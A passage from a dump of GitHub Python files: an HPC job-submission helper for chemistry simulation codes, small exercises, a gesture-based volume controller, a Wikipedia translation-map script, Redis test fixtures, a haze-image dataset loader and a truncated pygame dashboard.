loop_opt_script_filename \n else:\n each_run = f\"{self.vasp_run}\\n\"\n each_run += \"touch vasp.done\\n\"\n each_run += \"sleep 30\\n\" \n \n for d in dirs:\n # if use scratch, copy input to /scratch/vasp and run job in that dir,\n # when finished, copy to original working directory\n # scratch is recommended when perform small jobs\n if not sequence:\n os.chdir(d)\n d = d.replace(\"(\", \"\\(\").replace(\")\", \"\\)\")\n if 'vasp.done' in os.listdir():\n os.remove('vasp.done')\n os.chdir(pwd)\n if scratch:\n dir_path = \"/scratch/vasp\" + d\n runs += \"mkdir -p \" + dir_path + \"\\n\" # make dir under /scratch/vasp\n runs += \"cp \" + d + \"/* \" + dir_path + \"\\n\" # copy original to /scratch/vasp\n runs += \"cd \" + dir_path + \"\\n\" # chg dir to /scratch/vasp\n runs += each_run + \"\\n\" # run vasp\n runs += \"cp \" + dir_path + \"/* \" + d + \"\\n\" # copy finished job to original dir\n runs += \"rm -rf \" + dir_path + \"\\n\\n\" # remove finished job under /scratch/vasp\n # change dir to each input and run 'each_run'\n else:\n runs += \"cd \" + d + \"\\n\"\n runs += each_run\n else:\n inputfile = d # vasp input files (d) is cif file when sequence run\n runs += f\"{self.python_path} {script_path} {inputfile} {sequence_file} {self.python_path} {loop_opt_script_path} {refine_poscar}\\n\"\n runs += \"sleep 30\\n\\n\"\n\n if self.scheduler_type == \"PBS\":\n mpi = self.mpi.format(qname=self.q, jobname=jobname, ncpu=self.cpu, nselect=self.n_of_nodes)\n else:\n mpi = self.mpi.format(qname=self.q, jobname=jobname, ncpu=self.n_of_cpu)\n mpi += runs\n\n pwd = os.getcwd()\n mpi_filename = f\"mpi_{jobname}.sh\"\n f = open(mpi_filename, \"w\")\n f.write(mpi)\n f.close()\n shl(f\"{self.qsub} {mpi_filename}\", shell=True)\n time.sleep(0.5)\n #shl(\"rm -rf ./%s\" % mpi_filename, shell=True)\n\n def qchem(self):\n inputfile = self.inputfile\n outputfile = inputfile.replace(\".in\", \".out\")\n\n jobname = \"Q\" + inputfile.replace(\".in\", \"\")\n jobname = jobname.replace(\".\", \"_\").replace(\"-\", \"_\")\n\n if self.scheduler_type == \"PBS\":\n mpi = self.mpi.format(qname=self.q, jobname=jobname, ncpu=self.cpu, nselect=self.n_of_nodes)\n else:\n mpi = self.mpi.format(qname=self.q, jobname=jobname, ncpu=self.n_of_cpu)\n mpi += \"set MPI_HOME=/opt/mpi/intel-parallel-studio2013sp1/openmpi-1.6.5\\n\"\n mpi += f\"set MPI_EXEC={self.mpi_run}\\n\\n\"\n mpi += \"setenv QCSCRATCH /scratch\\n\"\n mpi += \"setenv QCAUX /opt/QChem4.2/qcaux\\n\"\n mpi += \"source /opt/QChem4.2/qcenv.csh\\n\\n\"\n mpi += f\"qchem {inputfile} {outputfile}\\n\"\n\n f = open(\"mpi.sh\", \"w\")\n f.write(mpi)\n f.close()\n\n shl(self.qsub + \" mpi.sh\", shell=True)\n shl(\"rm -rf ./mpi.sh\", shell=True)\n\n def ATK(self, atk_version=\"atk2017\"):\n inputfile = self.inputfile\n\n jobname = \"A\" + inputfile.replace(\".py\", \"\")\n jobname = jobname.replace(\".\", \"_\").replace(\"-\", \"_\")\n outputfile = inputfile.replace(\".py\", \".out\")\n\n if self.scheduler_type == \"PBS\":\n mpi = self.mpi.format(qname=self.q, jobname=jobname, ncpu=self.cpu, nselect=self.n_of_nodes)\n else:\n mpi = self.mpi.format(qname=self.q, jobname=jobname, ncpu=self.n_of_cpu)\n mpi += f\"set MPI_EXEC={self.atk_mpi_run}\\n\"\n mpi += \"setenv OMP_NUM_THREADS 1\\n\"\n mpi += \"setenv OMP_DYNAMIC FALSE\\n\\n\"\n mpi += \"setenv QUANTUM_LICENSE_PATH 6200@166.104.249.249\\n\\n\"\n mpi += f\"$MPI_EXEC -n {self.n_of_cpu} {self.atk_path} {inputfile} {outputfile}\\n\"\n\n f = open(\"mpi.sh\", \"w\")\n f.write(mpi)\n f.close()\n\n shl(self.qsub + \" mpi.sh\", shell=True)\n shl(\"rm -rf ./mpi.sh\", shell=True)\n\n def atat(self):\n dirname = os.getcwd()\n dirname = dirname.split(\"/\")[-1]\n\n inputfile = self.inputfile\n\n if \"/\" in inputfile and \"p+\" in inputfile:\n jobname = \"AT_\" + inputfile.split(\"/\")[-1]\n else:\n jobname = \"AT_\" + dirname + \"_\" + inputfile\n jobname = jobname.replace(\".\", \"_\").replace(\"-\", \"_\").replace(\"+\", \"_\")\n\n os.chdir(inputfile)\n\n if self.scheduler_type == \"PBS\":\n mpi = self.mpi.format(qname=self.q, jobname=jobname, ncpu=self.cpu, nselect=self.n_of_nodes)\n else:\n mpi = self.mpi.format(qname=self.q, jobname=jobname, ncpu=self.n_of_cpu)\n\n mpi += f\"runstruct_vasp -ng mpirun -np {self.n_of_cpu}\\n\"\n mpi += \"rm wait\\n\"\n\n f = open(\"mpi.sh\", \"w\")\n f.write(mpi)\n f.close()\n\n shl(self.qsub + \" mpi.sh\", shell=True)\n shl(\"rm -rf ./mpi.sh\", shell=True)\n\n # -- To show SGE queue system that \" I'm running now \"\n def pbs_runner(self):\n inputfile = self.inputfile\n\n jobname = inputfile.replace(\".py\", \"\")\n\n mpi = '''#!/bin/csh\n# Job name \n#$ -N %s\n\n# pe request\n%s\n\n# queue name\n%s\n\n# node\n%s\n\n#$ -V\n#$ -cwd\n\ncd $SGE_O_WORKDIR\n\npython %s\n\n ''' % (jobname, self.pe_request, self.queue_name, self.node_assign, inputfile)\n\n f = open(\"mpi.sh\", \"w\")\n f.write(mpi)\n f.close()\n\n shl(self.qsub + \" mpi.sh\", shell=True)\n shl(\"rm -rf ./mpi.sh\", shell=True)\n\n def lammps(self):\n inputfile = self.inputfile\n outputfile = inputfile.replace(\"in.\", \"out.\")\n\n jobname = \"L\" + inputfile.replace(\"in.\", \"\")\n jobname = jobname.replace(\".\", \"_\").replace(\"-\", \"_\")\n\n if self.scheduler_type == \"PBS\":\n mpi = self.mpi.format(qname=self.q, jobname=jobname, ncpu=self.cpu, nselect=self.n_of_nodes)\n else:\n mpi = self.mpi.format(qname=self.q, jobname=jobname, ncpu=self.n_of_cpu)\n\n mpi += f\"{self.lammps_mpirun_path} -np {self.n_of_cpu} {self.lammps_path} {inputfile} {outputfile}\\n\"\n\n f = open(\"mpi.sh\", \"w\")\n f.write(mpi)\n f.close()\n\n shl(self.qsub + \" mpi.sh\", shell=True)\n shl(\"rm -rf ./mpi.sh\", shell=True)\n\n def AIMD_NVT_Loop(self, structure_filename=None, temp=None, specie=\"Li\", screen='no_screen', max_step=250, vdw=False):\n from pathlib import Path\n MODULE_DIR = Path(__file__).resolve().parent\n loop_opt_script = str(MODULE_DIR) + \"/../Package/Diffusion/NVTLoopQueScript.py\"\n os.system('cp %s ./.NVTLoopQueScript.py' % loop_opt_script)\n script_filename = \".NVTLoopQueScript.py\"\n script_path = os.getcwd() + \"/\" + script_filename\n\n jobname = \"NVT%s_%dK\" % (structure_filename.replace(\".cif\", \"\"), temp)\n\n if self.scheduler_type == \"PBS\":\n mpi = self.mpi.format(qname=self.q, jobname=jobname, ncpu=self.cpu, nselect=self.n_of_nodes)\n else:\n mpi = self.mpi.format(qname=self.q, jobname=jobname, ncpu=self.n_of_cpu)\n mpi += f\"{self.python_path} {script_filename} {structure_filename} {temp} {specie} {screen} {max_step} {vdw}\\n\"\n\n f = open(\"mpi.sh\", \"w\")\n f.write(mpi)\n f.close()\n\n shl(self.qsub + \" mpi.sh\", shell=True)\n shl(\"rm -rf ./mpi.sh\", shell=True)\n\n def AIMD_NVT_Loop_batch(self, structure_files=None, temp=None, specie=\"Li\", screen='no_screen', max_step=250, vdw=False):\n from pathlib import Path\n MODULE_DIR = Path(__file__).resolve().parent\n loop_opt_script = str(MODULE_DIR) + \"/../Package/Diffusion/NVTLoopQueScript.py\"\n os.system('cp %s ./.NVTLoopQueScript.py' % loop_opt_script)\n script_filename = \".NVTLoopQueScript.py\"\n script_path = os.getcwd() + \"/\" + script_filename\n\n jobname = input(\"Job name: \")\n\n runs = \"\"\n pwd = os.getcwd()\n if 'structures' not in os.listdir('./'):\n os.mkdir('structures')\n for structure_filename in structure_files:\n dirname = structure_filename.replace(\".cif\", \"\")\n runs += \"cp %s structures; mkdir %s; mv %s %s; cp %s %s; cd %s\\n\" % (structure_filename, dirname, structure_filename, dirname, script_filename, dirname, dirname)\n runs += \"%s %s %s %s %s %s %s %s\\n\\n\" % (self.python_path, script_filename, structure_filename, temp, specie, screen, max_step, vdw)\n runs += \"cd %s \\n\" % pwd\n\n if self.scheduler_type == \"PBS\":\n mpi = self.mpi.format(qname=self.q, jobname=jobname, ncpu=self.cpu, nselect=self.n_of_nodes)\n else:\n mpi = self.mpi.format(qname=self.q, jobname=jobname, ncpu=self.n_of_cpu)\n mpi += runs\n\n f = open(\"mpi.sh\", \"w\")\n f.write(mpi)\n f.close()\n\n shl(self.qsub + \" mpi.sh\", shell=True)\n shl(\"rm -rf ./mpi.sh\", shell=True)\n\n def casm_run(self):\n jobname = raw_input(\"Job name: \")\n\n if self.scheduler_type == \"PBS\":\n mpi = self.mpi.format(qname=self.q, jobname=jobname, ncpu=self.cpu, nselect=self.n_of_nodes)\n else:\n mpi = self.mpi.format(qname=self.q, jobname=jobname, ncpu=self.n_of_cpu)\n\n mpi += \"casm-calc --run\\n\"\n\n f = open(\"mpi.sh\", \"w\")\n f.write(mpi)\n f.close()\n\n shl(self.qsub + \" mpi.sh\", shell=True)\n shl(\"rm -rf ./mpi.sh\", shell=True)\n\n def siesta(self):\n input_filename = self.inputfile.split(\"/\")[-1]\n dir_path = self.inputfile.replace(input_filename, \"\")\n jobname = \"S\" + input_filename.replace(\".fdf\", \"\")\n\n if self.scheduler_type == \"PBS\":\n mpi = self.mpi.format(qname=self.q, jobname=jobname, ncpu=self.cpu, nselect=self.n_of_nodes)\n else:\n mpi = self.mpi.format(qname=self.q, jobname=jobname, ncpu=self.n_of_cpu)\n\n mpi += f\"{self.mpirun} -np {self.n_of_cpu} {self.siesta_path} < {dirpath} > siesta.out\\n\"\n\n f = open(\"mpi.sh\", \"w\")\n f.write(mpi)\n f.close()\n\n shl(self.qsub + \" mpi.sh\", shell=True)\n shl(\"rm -rf ./mpi.sh\", shell=True)\n\n def siesta_AIMD_NVT_Loop(self, structure_filename=None, temp=None, specie=\"Li\"):\n # -- load loop queue script\n from CCpy.Package.Diffusion.SIESTA_NVTLoopQueScript import NVTLoopQueScriptString\n script_string = NVTLoopQueScriptString()\n script_filename = \".AIMDLoop.py\"\n f = open(script_filename, \"w\")\n f.write(script_string)\n f.close()\n\n jobname = \"SNVT%s_%dK\" % (structure_filename.replace(\".cif\", \"\"), temp)\n\n if self.scheduler_type == \"PBS\":\n mpi = self.mpi.format(qname=self.q, jobname=jobname, ncpu=self.cpu, nselect=self.n_of_nodes)\n else:\n mpi = self.mpi.format(qname=self.q, jobname=jobname, ncpu=self.n_of_cpu)\n\n mpi += f\"{self.python_path} {script_filename} {structure_filename} {temp} {specie}\\n\"\n\n f = open(\"mpi.sh\", \"w\")\n f.write(mpi)\n f.close()\n\n shl(self.qsub + \" mpi.sh\", shell=True)\n shl(\"rm -rf ./mpi.sh\", shell=True)\n","repo_name":"91bsjun/CCpy","sub_path":"CCpy/Queue/CCpyJobControl.py","file_name":"CCpyJobControl.py","file_ext":"py","file_size_in_byte":23168,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"37714196557","text":"def num(k):\n if k==1:\n return False\n else:\n for j in range(2,(k**(0.5)+1)):\n \n if k%j==0:\n return False\n return True \nshit_list=list(range(2,246912))\nans_list=[]\nfor i in shit_list:\n if num(i):\n ans_list.append(i)\n\nwhile True:\n n=int(input())\n if n==0:\n break\n ans=0\n for i in ans_list:\n if n promedios_autos:\n lista_mayores.append(i[1])\n\n\nlista_mayores2 =filter(lambda x: x > promedios_autos, lista_1)\nprint(lista_mayores)\n#operación funcional \nprint(list(lista_mayores2))","repo_name":"cherrux/Data_Science_Desafio_Latam","sub_path":"desafio7/untitled folder/Archive/listas_cinco.py","file_name":"listas_cinco.py","file_ext":"py","file_size_in_byte":437,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"22789810066","text":"import cv2\nimport mediapipe as mp\nimport hand_tracking_module as htm\nimport numpy as np\nimport math\nfrom ctypes import cast, POINTER\nfrom comtypes import CLSCTX_ALL\nfrom pycaw.pycaw import AudioUtilities, IAudioEndpointVolume\n\nweight_cam, heigth_cam = 640, 480\n\ndetector = htm.handDetector(detectionCon=0.7)\ndevices = AudioUtilities.GetSpeakers()\ninterface = devices.Activate(IAudioEndpointVolume._iid_, CLSCTX_ALL, None)\nvolume = cast(interface, POINTER(IAudioEndpointVolume))\nvolRange = volume.GetVolumeRange()\nminVol = volRange[0]\nmaxVol = volRange[1]\nvol = 0\nvolBar = 400\nvolPer = 0\n\ndetector = htm.HandDetector(detection_con=0.7)\n\ncap = cv2.VideoCapture(0)\ncap.set(3, weight_cam)\ncap.set(4, heigth_cam)\n\nwhile cap.isOpened():\n success, img = cap.read()\n img = detector.find_hands(img)\n landmark_list = detector.find_position(img, draw=False)\n if landmark_list != None:\n x1, y1 = landmark_list[4][1], landmark_list[4][2]\n x2, y2 = landmark_list[8][1], landmark_list[8][2]\n cx, cy = (x1 + x2) // 2, (y1 + y2) // 2\n cv2.circle(img, (x1, y1), 15, (255, 0, 255), cv2.FILLED)\n cv2.circle(img, (x2, y2), 15, (255, 0, 255), cv2.FILLED)\n cv2.line(img, (x1, y1), (x2, y2), (255, 0, 255), 3)\n cv2.circle(img, (cx, cy), 15, (255, 0, 255), cv2.FILLED)\n\n length = math.hypot(x2 - x1, y2 - y1)\n vol = np.interp(length, [50, 300], [minVol, maxVol])\n volBar = np.interp(length, [50, 300], [400, 150])\n volPer = np.interp(length, [50, 300], [0, 100])\n print(int(length), vol)\n volume.SetMasterVolumeLevel(vol, None)\n\n if length < 50:\n cv2.circle(img, (cx, cy), 15, (0, 255, 0), cv2.FILLED)\n cv2.rectangle(img, (50, 150), (85, 400), (255, 0, 0), 3)\n cv2.rectangle(img, (50, int(volBar)), (85, 400), (255, 0, 0), cv2.FILLED)\n cv2.putText(img, f'{int(volPer)} %', (40, 450), cv2.FONT_HERSHEY_COMPLEX, 1, (255, 0, 0), 3)\n\n cv2.imshow('img', img)\n if cv2.waitKey(5) & 0XFF == 27:\n break\ncap.release()\ncv2.destroyAllWindows()\n","repo_name":"zakaria-1990/gesture_volume_control","sub_path":"gesture_volume_control.py","file_name":"gesture_volume_control.py","file_ext":"py","file_size_in_byte":2062,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"33440781857","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Nov 05 2013 20:39:37 2013\r\n\r\n@author: t.gibon@gmail.com\r\n\"\"\"\r\n\r\nimport csv\r\nimport urllib\r\nimport codecs\r\nimport string\r\nimport re\r\nfrom bs4 import BeautifulSoup\r\n\r\ndef unicode_csv_reader(utf8_data, dialect=csv.excel, **kwargs):\r\n csv_reader = csv.reader(utf8_data, dialect=dialect, **kwargs)\r\n for row in csv_reader:\r\n yield [cell.decode('utf-8') for cell in row]\r\n\r\ndef mtranslate(to_translate, wiki_lang = 'en'):\r\n '''\r\n Return the translation using wikipedia\r\n you must shortcut the langage you define (French = fr, English = en, Spanish = es, etc...)\r\n if you don't define anything it will detect it or use english by default\r\n '''\r\n \r\n agents = {'User-Agent':\"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)\"}\r\n link = \"http://%s.wikipedia.org/wiki/%s\" % (wiki_lang, to_translate.replace(\" \", \"_\"))\r\n request = urllib.request.Request(link, headers=agents)\r\n page = urllib.request.urlopen(request).read()\r\n parsed_html = BeautifulSoup(page, 'lxml')\r\n interwiki = parsed_html.body.findAll('li', attrs = {'class':re.compile('interwiki-')})\r\n pair = [each.find('a').get('title') for each in interwiki]\r\n\r\n code = [each.find('a').get('hreflang') for each in interwiki]\r\n\r\n result = list()\r\n result.append(tuple(code))\r\n\r\n pairs = [each.split(u' \\u2013 ') for each in pair]\r\n\r\n result.append([each[0] for each in pairs])\r\n result.append([each[1] for each in pairs])\r\n\r\n filename = codecs.open('output_' + to_translate.replace(\" \", \"_\") + '.txt','w', encoding='utf-8')\r\n filename.write(u'Language\\t' + to_translate + u'\\n')\r\n\r\n for i in range(len(pair)):\r\n each = pair[i].split(u' \\u2013 ')\r\n filename.write(code[i] + u'\\t' + each[1] + u'\\t' + each[0] + u'\\n')\r\n\r\n return result\r\n \r\ndef ipa(to_translate, wiki_lang = 'en'):\r\n \r\n reader = list(csv.reader(open('wiki_lang_codes.txt','rb'), delimiter='\\t'))\r\n lang_codes = [row[0] for row in reader]\r\n lang_names = [row[1] for row in reader]\r\n lang_names = [l.decode('utf-8') for l in lang_names]\r\n \r\n agents = {'User-Agent':\"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)\"}\r\n link = \"http://%s.wiktionary.org/wiki/%s\" % (wiki_lang, string.lower(to_translate.replace(\" \", \"_\")))\r\n request = urllib.request.Request(link, headers=agents)\r\n page = urllib.request.urlopen(request).read()\r\n parsed_html = BeautifulSoup(page, 'lxml')\r\n \r\n lang_name = lang_names[lang_codes.index(wiki_lang)]\r\n parsed_html.body.findAll('span', attrs = {'id':lang_name})\r\n \r\n try:\r\n result = parsed_html.body.find('span', attrs = {'class':'IPA'}).contents[0]\r\n except:\r\n result = parsed_html.body.find('span', attrs = {'class':'API'}).contents[0]\r\n \r\n return result\r\n\r\ndef map_word_old(to_translate = 'love', from_language = 'en'):\r\n\r\n reader = list(csv.reader(open('Language_names.txt','rb'), delimiter='\\t'))\r\n lang_codes = [row[0] for row in reader[1:]]\r\n lang_names = [row[3] for row in reader[1:]]\r\n lang_names = [l.decode('utf-8') for l in lang_names]\r\n\r\n flower = mtranslate(to_translate,from_language)\r\n matches = list(set(flower[2]) & set(lang_names))\r\n non_matches = list((set(flower[2]) ^ set(lang_names)).intersection(set(lang_names)))\r\n\r\n to_replace = [lang_codes[lang_names.index(m)] for m in matches]\r\n replace_by = [flower[1][flower[2].index(m)] for m in matches]\r\n \r\n to_replace.extend([lang_codes[lang_names.index(m)] for m in non_matches])\r\n replace_by.extend([u'']*len(non_matches))\r\n \r\n replace_by = [re.sub(' \\(.*\\)','',s) for s in replace_by]\r\n \r\n test = codecs.open('Languages-Europe.svg','rU','utf-8').read()\r\n\r\n for i in range(len(to_replace)):\r\n test = test.replace(u'>' + to_replace[i] + u'','>' + replace_by[i] + u'')\r\n\r\n with codecs.open('Languages_Europe_' + to_translate + '.svg','wU','utf-8') as fi:\r\n fi.write(test)\r\n with codecs.open('Languages_Europe_last_output.svg','wU','utf-8') as fi2:\r\n fi2.write(test)\r\n \r\ndef map_word(to_translate = 'love', from_language = 'en'):\r\n '''\r\n This in an updated version of map_word_old, using a more legible map\r\n '''\r\n\r\n reader = list(csv.reader(open('Language_names.txt','rt',encoding = 'utf-8'), delimiter='\\t'))\r\n lang_codes = [row[0] for row in reader[1:]]\r\n lang_names = [row[1] for row in reader[1:]]\r\n\r\n flower = mtranslate(to_translate, from_language)\r\n matches = list(set(flower[2]) & set(lang_names))\r\n non_matches = list((set(flower[2]) ^ set(lang_names)).intersection(set(lang_names)))\r\n\r\n to_replace = [lang_codes[lang_names.index(m)] for m in matches]\r\n replace_by = [flower[1][flower[2].index(m)].lower() for m in matches]\r\n \r\n to_replace.extend([lang_codes[lang_names.index(m)] for m in non_matches])\r\n replace_by.extend([u'']*len(non_matches))\r\n \r\n to_replace.append(u'word')\r\n replace_by.append(u'\\\"' + to_translate + '\\\" in Europe') \r\n \r\n replace_by = [re.sub(' \\(.*\\)','',s) for s in replace_by]\r\n \r\n test = codecs.open('Simplified_Languages_of_Europe_map_base.svg','rU','utf-8').read()\r\n\r\n for i in range(len(to_replace)):\r\n test = test.replace(u'style=\"font-style:normal;-inkscape-font-specification:Arial\">' + to_replace[i] + u'',\r\n u'style=\"font-style:normal;-inkscape-font-specification:Arial\">' + replace_by[i] + u'')\r\n \r\n with codecs.open('Simplified_Languages_of_Europe_map_' + to_translate + '.svg','w','utf-8') as fi:\r\n fi.write(test)\r\n with codecs.open('Simplified_Languages_of_Europe_map_last_output.svg','w','utf-8') as fi2:\r\n fi2.write(test)\r\n \r\nif __name__ == '__main__':\r\n to_translate = 'love'\r\n language = 'en'\r\n mtranslate(to_translate, language)\r\n","repo_name":"thomasgibon/etymologymaps","sub_path":"map_word.py","file_name":"map_word.py","file_ext":"py","file_size_in_byte":6021,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"74698884613","text":"import subprocess\nfrom time import sleep\n\nimport pytest\nimport redis\n\n@pytest.fixture(scope='module')\ndef server():\n with subprocess.Popen(['animals']) as server:\n sleep(3)\n yield\n server.kill()\n\n@pytest.fixture\ndef preload():\n \"\"\"\n Flush all items from the DB, but preserve the farmer if the\n server set it on startup. Add a few animals.\n \"\"\"\n r = redis.StrictRedis(host='localhost', port=6379, db=0)\n farmer = r.hgetall('animals:user:farmer')\n r.flushdb()\n if farmer:\n r.hmset('animals:user:farmer', farmer)\n\n r.set('animals:item:cow', 'moo')\n r.set('animals:item:chicken', 'cluck')\n r.set('animals:item:pig', 'oink') \n","repo_name":"appeltel/webservice-animals","sub_path":"tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":688,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"22728437719","text":"# --- Imports --- #\r\nimport torch\r\nimport torch.utils.data as data\r\nfrom torchvision.transforms import Compose, ToTensor\r\nfrom UCM.ucm import ucm\r\n\r\n\r\n# --- Haze-Wild dataset --- #\r\nclass Haze_Wild(data.Dataset):\r\n\r\n def __init__(self, images_path, labels, crop_size, filters, method=0, mode='train'):\r\n\r\n if mode == 'train':\r\n self.image_path = images_path\r\n print(\"Total training examples:\", len(self.image_path))\r\n elif mode == 'val':\r\n self.image_path = images_path\r\n print(\"Total validation examples:\", len(self.image_path))\r\n else:\r\n self.image_path = images_path\r\n print(\"Total test examples:\", len(self.image_path))\r\n\r\n self.labels = labels\r\n self.crop_size = crop_size\r\n self.method = method\r\n self.filters = filters\r\n\r\n def get_images(self, index):\r\n method = self.method\r\n seg_img, org_img = ucm(self.image_path[index], self.crop_size, self.filters, method)\r\n label = self.labels[index]\r\n\r\n transform = Compose([ToTensor()])\r\n seg = transform(seg_img)\r\n org = transform(org_img)\r\n if method == 0:\r\n return org, label\r\n else:\r\n return torch.cat((seg, org)), label\r\n\r\n def __getitem__(self, index):\r\n res = self.get_images(index)\r\n return res\r\n\r\n def __len__(self):\r\n return len(self.image_path)\r\n","repo_name":"JYBlank-L/Unsupervised-Contrastive-Masking-for-Visual-Haze-Classification","sub_path":"datasets/Wild1.py","file_name":"Wild1.py","file_ext":"py","file_size_in_byte":1432,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"20721496143","text":"import pygame\nimport time\nimport datetime\nimport requests\nfrom pprint import pprint\nimport pygame\nfrom pygame.locals import *\nimport random\nfrom Data import Data\nfrom OpenGL.GL import *\nfrom OpenGL.GLU import *\nfrom ControlPanelClass import ControlPanel_main\n\n\nimageDirectory = \"/Users/atulphadke/Documents/Energy/images/\"\nfontDirectory = \"/Users/atulphadke/Documents/Energy/fonts/\"\npreviousRes = 0\nnewRes = 0\npreviousImage = imageDirectory + \"beginning.png\"\nnewImage = imageDirectory + \"beginning.png\"\nfirstTime = 0\n\npygame.init()\nscreen = pygame.display.set_mode((1024, 600))\nrectBlack = pygame.Rect(0, 0, 1024, 600)\nclock = pygame.time.Clock()\n\ndef ControlPanelButton(imageDirectory, fontDirectory, screen):\n x, y = pygame.mouse.get_pos()\n if x >= 585 and x <= 775 and y <= 575 and y >= 515:\n button = pygame.image.load(imageDirectory + \"HoverControlPanel.png\")\n button = pygame.transform.scale(button, (275, 200))\n screen.blit(button, (550, 500))\n if event.type == pygame.MOUSEBUTTONDOWN:\n print(\"a\")\n verticies = (\n (1, -1, -1),\n (1, 1, -1),\n (-1, 1, -1),\n (-1, -1, -1),\n (1, -1, 1),\n (1, 1, 1),\n (-1, -1, 1),\n (-1, 1, 1)\n )\n edges = (\n (0,1),\n (0,3),\n (0,4),\n (2,1),\n (2,3),\n (2,7),\n (6,3),\n (6,4),\n (6,7),\n (5,1),\n (5,4),\n (5,7)\n )\n display = (1024,600)\n screen = pygame.display.set_mode((1024,600), DOUBLEBUF|OPENGL)\n gluPerspective(45, (display[0]/display[1]), 0.1, 50.0)\n glTranslatef(0.0,0.0, -5)\n speed = 1\n i = 0\n v = 0\n change = 1\n maxRotations = 9\n minRotations = -9\n fin = False\n while True:\n if i == 10:\n speed = speed - change\n i = 0\n if speed == minRotations:\n change = -1\n if speed == maxRotations:\n change = 1\n glRotatef(speed, 0, 2, 0)\n glClear(GL_COLOR_BUFFER_BIT|GL_DEPTH_BUFFER_BIT)\n glBegin(GL_LINES)\n for edge in edges:\n for vertex in edge:\n glVertex3fv(verticies[vertex])\n pygame.display.flip()\n #pygame.time.wait(10)\n i = i + 1\n v = v + 5\n if v == 1500:\n v = 0\n screen = pygame.display.set_mode((1024, 600))\n fin = True\n return fin\n else:\n button = pygame.image.load(imageDirectory + \"ControlPanel.png\")\n button = pygame.transform.scale(button, (275, 200))\n screen.blit(button, (550, 500))\n\ndef ResetButton(imageDirectory, fontDirectory):\n x, y = pygame.mouse.get_pos()\n if x >= 785 and x <= 975 and y <= 575 and y >= 515:\n button = pygame.image.load(imageDirectory + \"HoverRoundedRectangle.png\")\n button = pygame.transform.scale(button, (275, 200))\n screen.blit(button, (750, 500))\n if event.type == pygame.MOUSEBUTTONDOWN:\n print(\"a\")\n verticies = (\n (1, -1, -1),\n (1, 1, -1),\n (-1, 1, -1),\n (-1, -1, -1),\n (1, -1, 1),\n (1, 1, 1),\n (-1, -1, 1),\n (-1, 1, 1)\n )\n\n edges = (\n (0,1),\n (0,3),\n (0,4),\n (2,1),\n (2,3),\n (2,7),\n (6,3),\n (6,4),\n (6,7),\n (5,1),\n (5,4),\n (5,7)\n )\n def Cube():\n glBegin(GL_LINES)\n for edge in edges:\n for vertex in edge:\n glVertex3fv(verticies[vertex])\n glEnd()\n def main():\n display = (1024,600)\n screen = pygame.display.set_mode((1024,600), DOUBLEBUF|OPENGL)\n gluPerspective(45, (display[0]/display[1]), 0.1, 50.0)\n glTranslatef(0.0,0.0, -5)\n speed = 1\n i = 0\n v = 0\n change = 1\n maxRotations = 9\n minRotations = -9\n fin = False\n while True:\n if i == 10:\n speed = speed - change\n i = 0\n if speed == minRotations:\n change = -1\n if speed == maxRotations:\n change = 1\n glRotatef(speed, 0, 2, 0)\n glClear(GL_COLOR_BUFFER_BIT|GL_DEPTH_BUFFER_BIT)\n Cube()\n pygame.display.flip()\n #pygame.time.wait(10)\n i = i + 1\n v = v + 5\n if v == 500:\n v = 0\n screen = pygame.display.set_mode((1024, 600))\n fin = True\n return fin\n main()\n finish = main()\n if finish == True:\n return finish\n else:\n button = pygame.image.load(imageDirectory + \"Rounded_Rectangle.png\")\n button = pygame.transform.scale(button, (275, 200))\n screen.blit(button, (750, 500))\ndef Megamanand10800A(imageDirectory, fontDirectory):\n megaman = imageDirectory + \"sprite_09.png\"\n loadingicons = pygame.image.load(megaman)\n loadingicons = pygame.transform.scale(loadingicons, (200, 200))\n screen.blit(loadingicons, (780, 180))\n Team = pygame.font.Font(fontDirectory + 'BebasNeueBold.ttf', 90)\n Teams = Team.render(\"10800A\", 40, (255, 255, 255))\n screen.blit(Teams, (770, 380))\ndef CarbonDioxide(maximum, imageDirectory, fontDirectory):\n H20 = 500\n if H20 <= (maximum/30):\n image = imageDirectory + \"frame_00_delay-0.33s.png\"\n\n elif (maximum/30)*2 <= H20 <= (maximum/30)*3:\n image = imageDirectory + \"frame_01_delay-0.33s.png\"\n\n elif (maximum/30)*3 <= H20 <= (maximum/30)*4:\n image = imageDirectory + \"frame_02_delay-0.33s.png\"\n\n elif (maximum/30)*4 <= H20 <= (maximum/30)*5:\n image = imageDirectory + \"frame_03_delay-0.33s.png\"\n\n elif (maximum/30)*5 <= H20 <= (maximum/30)*6:\n image = imageDirectory + \"frame_04_delay-0.33s.png\"\n\n elif (maximum/30)*6 <= H20 <= (maximum/30)*7:\n image = imageDirectory + \"frame_05_delay-0.33s.png\"\n\n elif (maximum/30)*7 <= H20 <= (maximum/30)*8:\n image = imageDirectory + \"frame_06_delay-0.33s.png\"\n\n elif (maximum/30)*8 <= H20 <= (maximum/30)*9:\n image = imageDirectory + \"frame_07_delay-0.33s.png\"\n\n elif (maximum/30)*9 <= H20 <= (maximum/30)*10:\n image = imageDirectory + \"frame_08_delay-0.33s.png\"\n\n elif (maximum/30)*10 <= H20 <= (maximum/30)*11:\n image = imageDirectory + \"frame_09_delay-0.33s.png\"\n\n elif (maximum/30)*11 <= H20 <= (maximum/30)*12:\n image = imageDirectory + \"frame_10_delay-0.33s.png\"\n\n elif (maximum/30)*12 <= H20 <= (maximum/30)*13:\n image = imageDirectory + \"frame_11_delay-0.33s.png\"\n\n elif (maximum/30)*13 <= H20 <= (maximum/30)*14:\n image = imageDirectory + \"frame_12_delay-0.33s.png\"\n\n elif (maximum/30)*14 